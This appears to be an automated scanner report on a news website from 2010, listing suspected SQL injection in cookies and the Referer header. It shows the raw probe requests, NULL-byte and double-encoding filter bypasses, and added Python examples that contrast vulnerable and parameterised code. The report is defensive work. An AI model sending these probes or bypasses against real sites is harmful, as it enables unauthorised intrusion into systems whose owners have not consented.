GET /college-sports/ci_16785433?source=rss HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B'; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='BCS berth caps turnaround for a team that four years ago was 1-11'><meta name="keywords" co ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /college-sports/ci_16785433?source=rss HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B''; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.mercurynews.com/college-sports/ci_16 ...[SNIP]...
The UserType cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the UserType cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /college-sports/ci_16785923?source=rss HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser'; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='The teams will be making their debut in the BCS championship game when they meet Jan. 10 in ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /college-sports/ci_16785923?source=rss HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser''; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='The teams will be making their debut in the BCS championship game when they meet Jan. 10 in ...[SNIP]...
The UserID cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the UserID cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /college-sports/ci_16793572 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI%00'; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Summary for this story goes here and heres some morej summary if you want to use more ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /college-sports/ci_16793572 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI%00''; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
Response 2 (redirected)
HTTP/1.1 302 Moved Temporarily Server: Apache/2.0.52 (Red Hat) Location: https://secure.passport.mnginteractive.com/mngi/servletDispatch/ErightsPassportServlet.dyn?url=http://www.mercurynews.com/college-sports/ci_16793572?nclick_check=1&forced=true Vary: Accept-encoding Expires: Wed, 08 Dec 2010 07:22:26 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Wed, 08 Dec 2010 07:22:26 GMT Connection: close Connection: Transfer-Encoding Content-Type: text/html;charset=UTF-8 Content-Length: 449
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="https://secure.passport.mnginteractive.com/mngi ...[SNIP]...
The __g_c cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __g_c cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte: the filter stops reading at the first NUL and never sees the quote that follows it, while the application keeps the whole value and passes the quote through to the database. You should fix the actual vulnerability within the application code by parameterising the query that consumes the __g_c cookie, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /college-sports/ci_16793572?source=rss HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0%00'; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Summary for this story goes here and heres some morej summary if you want to use more ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /college-sports/ci_16793572?source=rss HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0%00''; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Summary for this story goes here and heres some morej summary if you want to use more ...[SNIP]...
The fPage cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the fPage cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. Note that Response 2 below is a 302 to the passport registration servlet rather than the article page, so the disappearance of the error should be confirmed against a stable article response before this is treated as a confirmed finding.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the fPage cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
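Added Python example (not the report's or the site's code) of the decode-order problem behind this finding and the identical s_sq, source, User-Agent and __g_u findings further down: a validation step that runs on the once-decoded value while the application decodes a second time, beside the corrected order in which every decode happens before the check. The fPage value and the pipeline functions are constructed for illustration.

```python
import re
import urllib.parse

# Constructed probe values modelled on the fPage cookie in the requests below.
BASE = "false"
SINGLE_ENCODED = BASE + "%27"     # one decode yields false'
DOUBLE_ENCODED = BASE + "%2527"   # one decode yields false%27, a second yields false'

PENDING_ENCODING = re.compile(r"%[0-9A-Fa-f]{2}")


def server_decode(raw_value: str) -> str:
    """The web server's single URL-decode of the incoming value."""
    return urllib.parse.unquote(raw_value)


def validate(value: str) -> bool:
    """The character check the application applies: no single quotes."""
    return "'" not in value


def still_encoded(value: str) -> bool:
    """A once-decoded value that still contains %XX sequences is itself a
    signal worth logging: legitimate cookies rarely arrive double-encoded."""
    return PENDING_ENCODING.search(value) is not None


def vulnerable_pipeline(raw_value: str):
    """Validation runs on the once-decoded value, but the application then
    decodes again before using it, so %2527 slips past the check as %27 and
    becomes a quote only afterwards. Returns (allowed, value_used_in_query)."""
    once = server_decode(raw_value)
    if not validate(once):
        return False, None
    twice = urllib.parse.unquote(once)   # the redundant second decode
    return True, twice


def hardened_pipeline(raw_value: str, application_decodes_again: bool = False):
    """Corrected order: finish every decode the application is going to do,
    validate that final form, and use exactly that form afterwards, so the
    check and the query see the same string. The default drops the second
    decode altogether, which is what the remediation detail recommends."""
    value = server_decode(raw_value)
    if application_decodes_again:
        value = urllib.parse.unquote(value)
    if not validate(value):
        return False, None
    return True, value


if __name__ == "__main__":
    print("vulnerable:", vulnerable_pipeline(DOUBLE_ENCODED))
    print("hardened, one decode:", hardened_pipeline(DOUBLE_ENCODED))
    print("hardened, decode-then-check:",
          hardened_pipeline(DOUBLE_ENCODED, application_decodes_again=True))
    print("suspicious residue:", still_encoded(server_decode(DOUBLE_ENCODED)))
```

With the second decode removed the value reaching the query is the literal text false%27, which contains no quote; with the second decode kept but moved before validation, the same input is rejected. Either ordering is consistent; the vulnerable one is not.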
Request 1
GET /college-sports/ci_16793572 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false%2527; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Summary for this story goes here and heres some morej summary if you want to use more ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /college-sports/ci_16793572 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false%2527%2527; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
Response 2 (redirected)
HTTP/1.1 302 Moved Temporarily Server: Apache/2.0.52 (Red Hat) Location: https://secure.passport.mnginteractive.com/mngi/servletDispatch/ErightsPassportServlet.dyn?url=http://www.mercurynews.com/college-sports/ci_16793572?nclick_check=1&forced=true Vary: Accept-encoding Expires: Wed, 08 Dec 2010 07:22:31 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Wed, 08 Dec 2010 07:22:31 GMT Connection: close Connection: Transfer-Encoding Content-Type: text/html;charset=UTF-8 Content-Length: 449
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="https://secure.passport.mnginteractive.com/mngi ...[SNIP]...
The u cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the u cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /college-sports/ci_16793572?source=rss HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B'; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Summary for this story goes here and heres some morej summary if you want to use more ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /college-sports/ci_16793572?source=rss HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B''; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Summary for this story goes here and heres some morej summary if you want to use more ...[SNIP]...
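The single-quote / double-quote differential that every finding in this section rests on, as an added Python example against an in-memory SQLite table (constructed here; not the report's or the site's code): a lookup that concatenates the cookie value into the SQL text fails on one quote and recovers on two, while the parameterised form of the same query does neither. The table, its row and the function names are assumptions; the UserID value is the one shown in the requests.

```python
import sqlite3

# In-memory stand-in for the application's database, with one constructed
# row keyed on the UserID value that appears in the requests.
USER_ID = "CG3BTKSGEWDI4CUUCBWCFFI"
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (user_id TEXT PRIMARY KEY, name TEXT)")
conn.execute("INSERT INTO users VALUES (?, ?)", (USER_ID, "constructed-user"))


def lookup_vulnerable(user_id: str):
    """String concatenation: the cookie value becomes part of the SQL text,
    so a quote inside it changes the statement's structure."""
    sql = "SELECT name FROM users WHERE user_id = '" + user_id + "'"
    return conn.execute(sql).fetchall()


def lookup_parameterised(user_id: str):
    """Placeholder binding: the value is passed as data after the statement
    has been parsed, so no character in it can alter the query."""
    return conn.execute(
        "SELECT name FROM users WHERE user_id = ?", (user_id,)
    ).fetchall()


def probe(lookup, base: str) -> dict:
    """Reproduce the scanner's differential: send base + ' and base + ''
    and record whether the database rejected each statement."""
    outcome = {}
    for suffix in ("'", "''"):
        try:
            lookup(base + suffix)
            outcome[suffix] = "ok"
        except sqlite3.Error:
            outcome[suffix] = "error"
    return outcome


def looks_injectable(lookup, base: str) -> bool:
    """The tell: one quote leaves the string literal unterminated and breaks
    the statement; two quotes are an escaped quote inside the literal, so the
    statement parses again and simply matches no row."""
    result = probe(lookup, base)
    return result["'"] == "error" and result["''"] == "ok"


if __name__ == "__main__":
    print("concatenated:", probe(lookup_vulnerable, USER_ID),
          "injectable:", looks_injectable(lookup_vulnerable, USER_ID))
    print("parameterised:", probe(lookup_parameterised, USER_ID),
          "injectable:", looks_injectable(lookup_parameterised, USER_ID))
```

In the captured traffic the "error" is only a difference between two HTTP responses (in several findings above, a 302 in place of the article), which is why each finding asks you to read the error text itself: the database-level behaviour shown here is what that review has to establish before the cookie is treated as injectable.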
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. Note that Response 2 below is a 302 redirect rather than the article page, so the disappearance of the error should be confirmed against a stable article response before this is treated as a confirmed finding.
Request 1
GET /college-sports/ci_16793781?source=rss HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669; Referer: http://www.google.com/search?hl=en&q='
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='But Auburn quarterback Cam Newton is considered the overwhelming favorite'><meta name="keyw ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /college-sports/ci_16793781?source=rss HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669; Referer: http://www.google.com/search?hl=en&q=''
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.mercurynews.com/college-sports/ci_16 ...[SNIP]...
The s_sq cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_sq cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. Note that Response 2 below is a 302 to the passport registration servlet rather than the article page, so the disappearance of the error should be confirmed against a stable article response before this is treated as a confirmed finding.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the s_sq cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /college-sports/ci_16793781 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D%2527; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='But Auburn quarterback Cam Newton is considered the overwhelming favorite'><meta name="keyw ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
